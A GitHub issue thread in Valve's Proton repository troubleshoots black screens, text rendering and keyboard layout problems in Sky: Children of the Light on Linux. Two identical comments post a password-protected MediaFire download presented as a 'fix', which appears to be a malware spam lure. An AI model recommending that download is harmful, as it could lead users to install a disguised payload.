### ISSUE TITLE
Sky: Children of the Light (2325290)

### ISSUE THREAD

**Issue by LividJava** [ValveSoftware/Proton#8040]
# Compatibility Report
- Name of the game with compatibility issues: Sky: Children of the Light
- Steam AppID of the game: 2325290

## System Information
- GPU: AMD RX480
- Video driver version: Mesa 24.2.1
- Kernel version: 6.10.7
- Link to full system information report as [Gist](https://gist.github.com/): https://gist.github.com/LividJava/e6f785e2d5f1fcbc31ecb334636850af
- Proton version: Proton Experimental (9.0-202)

## I confirm:
- [x] that I haven't found an existing compatibility report for this game.
- [x] that I have checked whether there are updates for my system available.

[steam-2325290.log](https://github.com/user-attachments/files/16823229/steam-2325290.log)

## Symptoms 
 - When opening Text fields (such as chat, names, or other) the screen will blank. You can still type within the text field and send it.
 - When attempting to take a screenshot, the screen with momentarily freeze and not save. The same is true for the in game camera feature.

### Screenshots
1. Open and run Sky.
2. Go past the title screen.
3. Attempt to take a Screenshot via Steam.
  3a. Hold `Alt` and while using the Mouse press the Camera button in the lower right hand corner.

### Chat
1. Open and run Sky.
2. Go past the title screen
3. Open a text field. (The easiest is chat. you can open this by pressing `Enter` while in game.)

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by shinyPy** [comment]
Switching to ProtonGE Fixed this, at the loss ability of screenshots.

**Comment by LividJava** [comment]
Seems like Screenshot bug is present on Windows. So it's a game bug misidentified as a Proton issue. just didn't know at the time.

**Comment by Novantric** [comment]
Running under wayland with Nvidia drivers causes black screens past the title. Switching to X11 fixes the issue.
I don't have the know-how to know what's up. Is this Proton or Xwayland?

**Comment by shinyPy** [comment]
Got the same problem with wayland now, previously it was fine.

**Comment by hackcr1258** [comment]
nVidia card holder here, can confirm this issue is still persistent in Wayland protocols

**Comment by Reonu** [comment]
Game is broken on Nvidia Wayland at the moment. Confirmed on both an RTX 2070 laptop and an RTX 4070Ti Super desktop. Goes into a black screen and the game can't be played.

**Comment by Novantric** [comment]
Temporary Fix: Open an XOrg session and set the game to windowed. I found this out by accident and now I can play under Wayland!

**Comment by hackcr1258** [comment]
> Temporary Fix: Open an XOrg session and set the game to windowed. I found this out by accident and now I can play under Wayland!

Did you try opening chat? 
The main purpose of this thread is to pin that chat and camera causes a blackscreen until you close it.

**Comment by Novantric** [comment]
Chat and text input fields still blackscreen, but it still works.

**Comment by yemouu** [comment]
Using Proton 8 seems to be a work around for the black screen when opening the chat and input fields. I am experiencing a another issue though, for all text in the game, the text's mesh is visible:

![Image](https://github.com/user-attachments/assets/077d38d7-babe-4ff2-b63c-c11ac699954d)

It is also visible on the spirits:
![Image](https://github.com/user-attachments/assets/29db22e3-5748-431c-95dd-e029ed524b95)

I've seen this issue reported on protondb as well and we are both using Intel Arc cards so this is likely an issue specific to Intel.

Edit: This [issue](https://gitlab.freedesktop.org/mesa/mesa/-/issues/12966) has been reported upstream to mesa.

**Comment by Novantric** [comment]
Can confirm using Proton-GE 8 fixes the text issue and doesn't give me the above issues, but fullscreen still doesn't work and it seems more prone to crashes.

**Comment by Novantric** [comment]
Fullscreen works as of 570 stable

**Comment by alasky17** [comment]
@yemouu @Novantric Could you please retest on Proton 10 beta?  I am hoping that both the black screen with chat/input fields and the visible text mesh are fixed with Proton 10 - please let me know if you can still reproduce either issue :)

**Comment by Novantric** [comment]
The text issue seems to be fixed @alasky17 ! The only other immediate issue is this border when not in fullscreen.
![Image](https://github.com/user-attachments/assets/c98dd231-23ca-4476-a6db-fe73eedc8c7f)

**Comment by yemouu** [comment]
No longer experiencing the black screen when opening text chat but I am still seeing the text meshes.
![Image](https://github.com/user-attachments/assets/2758125a-6f86-46b0-a1c1-c07588918836)

**Comment by yemouu** [comment]
The issue I was describing seems to have been fixed in mesa with [this branch](https://gitlab.freedesktop.org/mesa/mesa/-/merge_requests/35111)

**Comment by LividJava** [comment]
@kisak-valve Game is listed as Verified on Steam, Label change?

**Comment by simifor** [comment]
@LividJava what isn't working on deck?

**Comment by LividJava** [comment]
I'm not on Deck, I'm on a full arch linux system. I'm using SwayFX on Wayland and am still encountering issues with Text Input, basically a white box appears (though this might be an IME but it's present even with FCITX closed) in the center of the screen.

https://github.com/user-attachments/assets/01cc8a0f-dd0f-4969-8d17-c3a7df024cd7

**Comment by JustCryen** [comment]
Hi, I have an issue with keyboard layout within the game.  
It seems to be set to English, I might have the system language and the game language set to English but I have a different keyboard layout set in the system itself.  
I'm not sure if this issue is strictly related to Proton or not, but I would love to get my actual keyboard layout working... chatting with friends is a little bit too troublesome.  

I tried setting locales and disabling iBus using environment variables in game's Launch Options but I haven't been able to fix it yet.

**Comment by alasky17** [comment]
@JustCryen I have a couple of suggestions - 
1) Make sure that your preferred keyboard layout is the **very top** one in the list in your OS system settings, not just selected at the time.
2) Depending on what language you are trying to use - if you are trying to set locale, please try `HOST_LC_ALL=[your locale] %command%` in the launch options for the game.  This is the recommended locale environment variable to set manually for Proton.

**Comment by JustCryen** [comment]
@alasky17 
1. It is my only keyboard layout
2. Yes, thank you!  That one works!
I ended up using `HOST_LANG=[your locale] HOST_LC_ALL=[your locale] %command%`
